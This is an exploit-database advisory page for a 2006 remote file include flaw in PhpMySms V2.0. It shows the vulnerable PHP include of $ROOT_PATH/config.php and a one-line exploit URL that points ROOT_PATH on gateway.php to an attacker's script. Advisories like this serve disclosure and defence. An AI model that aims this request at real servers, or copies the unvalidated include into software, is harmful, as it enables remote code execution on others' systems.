header-logo
Suggest Exploit
vendor:
PhpMySms
by:
Persian-Defacer
9,3
CVSS
HIGH
Remote File Include
98
CWE
Product Name: PhpMySms
Affected Version From: V2.0
Affected Version To: V2.0
Patch Exists: YES
Related CWE: N/A
CPE: a:phpmysms:phpmysms:2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

PhpMySms <= V2.0 (ROOT_PATH) Remote File Include Vulnerability

A remote file include vulnerability exists in PhpMySms <= V2.0, due to the application including files based on user input without proper validation. An attacker can exploit this vulnerability to include arbitrary files from remote locations, which can lead to the execution of arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files.
Source

Exploit-DB raw data:

PhpMySms <= V2.0 (ROOT_PATH) Remote File Include Vulnerability
URL : Http://www.phpmysms.com
 
Author=Persian-Defacer
www.Hacking-Boys.com
==============================================================
if (($_POST[mode] == "1") or ($_GET[mode] == "1")) {
include ("config.php");
} else {
include ("$ROOT_PATH/config.php");
}
==============================================================


Exploit : http://[site]/[sms location]/sms_config/gateway.php?ROOT_PATH=[evil_script]

# milw0rm.com [2006-06-24]

Navigation

Suggest Exploit

Services By CQR